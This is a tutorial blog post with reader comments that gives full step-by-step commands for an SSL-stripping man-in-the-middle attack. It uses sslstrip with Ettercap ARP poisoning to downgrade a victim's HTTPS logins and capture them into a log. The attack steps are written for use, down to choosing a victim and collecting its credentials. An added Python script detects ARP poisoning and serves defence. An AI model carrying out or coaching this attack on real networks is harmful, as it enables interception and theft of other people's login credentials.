Strip SSL via Ettercap Man in the Middle Attack

SSL Strip

This tool provides a demonstration of the HTTPS stripping attacks that were presented at Black Hat DC 2009. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial.

In this article I will walk you through installing sslstrip along with Ettercap and performing a MITM attack.

1) Download Ettercap with GTK

sudo apt-get install ettercap ettercap-gtk

2) Download sslstrip

wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.7.tar.gz

3) Extract sslstrip

tar zxvf sslstrip-0.7.tar.gz

4) Redirect requests on port 80 (HTTP) to sslstrip running on port 10000

sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

5) Verify the entry in nat table

sudo iptables --list -t nat

6) Enable forwarding

echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward

7) Check forwarding

sudo cat /proc/sys/net/ipv4/ip_forward

You should get 1 as a reply.

8) Run sslstrip, listening on port 10000 and logging to sslstrip.log

sudo python sslstrip-0.7/sslstrip.py -w sslstrip.log -l 10000

9) Monitor the log

sudo tail -F sslstrip.log

10) Launch ettercap GUI with packet dump

sudo ettercap -G -w ~/ettercap_packets.pcap

11) Enter Unified sniffing

Sniff -> Unified sniffing

12) Select your wireless interface (this may be different than mine, check yours via 'ifconfig')

Network interface: wlan0

13) Scan for hosts

Hosts -> Scan for hosts

14) View hosts list from scan

Hosts -> Host list

15) Select targets

Highlight the victim -> Add to Target 1

Highlight the access point -> Add to Target 2

16) View added targets

Targets -> Current Targets

17) Perform arp poisoning (MITM Attack) on targets

Mitm -> Arp poisoning

You can test the stripping of SSL by browsing to an SSL-supported site. http://facebook.com is a good example.

After the victim logs in, you will see the output in your sslstrip.log. Don't forget to go back with Wireshark and see if you got anything good in your ettercap_packets.pcap log.

Enjoy!
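
From the defender's side, the ARP poisoning in step 17 shows up in the victim's neighbour table: the access point's IP address starts resolving to the poisoning host's MAC. The following is an added example, not part of the original article or of sslstrip/ettercap. It parses text in the format printed by `ip neigh show`; the function names, addresses and sample tables are constructed for illustration.

```python
import re
from collections import defaultdict

# Matches `ip neigh show` lines such as:
#   192.168.1.1 dev wlan0 lladdr 00:11:22:33:44:55 REACHABLE
NEIGH_RE = re.compile(
    r"^(?P<ip>\S+)\s+dev\s+\S+\s+lladdr\s+(?P<mac>[0-9a-fA-F:]{17})\b")

def parse_neigh(text):
    """Return {ip: mac} for entries that have a resolved link-layer address."""
    table = {}
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:  # FAILED/INCOMPLETE entries carry no lladdr and are skipped
            table[m.group("ip")] = m.group("mac").lower()
    return table

def find_arp_anomalies(current, baseline):
    """Compare a neighbour table against known-good IP -> MAC pins."""
    findings = []
    # 1. A pinned address (e.g. the access point) now resolves to another MAC.
    for ip, good_mac in baseline.items():
        seen = current.get(ip)
        if seen and seen != good_mac.lower():
            findings.append(("mac_changed", ip, seen))
    # 2. One MAC answers for several IPs: the poisoning host's own address
    #    plus the address it impersonates.
    by_mac = defaultdict(list)
    for ip, mac in current.items():
        by_mac[mac].append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            findings.append(("mac_shared", mac, tuple(sorted(ips))))
    return findings

# Constructed sample data (assumed addresses, not from a real network).
BASELINE = {"192.168.1.1": "00:11:22:33:44:55"}  # access point, pinned
CLEAN = """\
192.168.1.1 dev wlan0 lladdr 00:11:22:33:44:55 REACHABLE
192.168.1.23 dev wlan0 lladdr de:ad:be:ef:00:23 STALE
192.168.1.40 dev wlan0  FAILED
"""
POISONED = """\
192.168.1.1 dev wlan0 lladdr DE:AD:BE:EF:00:23 REACHABLE
192.168.1.23 dev wlan0 lladdr de:ad:be:ef:00:23 STALE
"""

if __name__ == "__main__":
    for name, sample in (("clean", CLEAN), ("poisoned", POISONED)):
        print(name, find_arp_anomalies(parse_neigh(sample), BASELINE))
```

A shared MAC is not always hostile (a router with several addresses on one interface will trigger it), so treat mac_changed on a pinned access point as the stronger signal.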

Why port 80?

I'm having trouble getting this to work, and I'm wondering if it has something to do with the iptables entry for port 80. Since we are trying to sniff https traffic, wouldn't it be on port 443? Or is there something I'm missing? Thanks!

Submitted by Anonymous on Mon, 08/01/2011 - 10:13.
Port 80

Port 80 is correct. We will be serving the victim a *NON* SSL page, which will be on the standard HTTP port, 80.

I just checked my personal script I wrote for MITM SSLStripping and it also uses port 80.

Submitted by Tim Ashley on Mon, 08/01/2011 - 10:28.
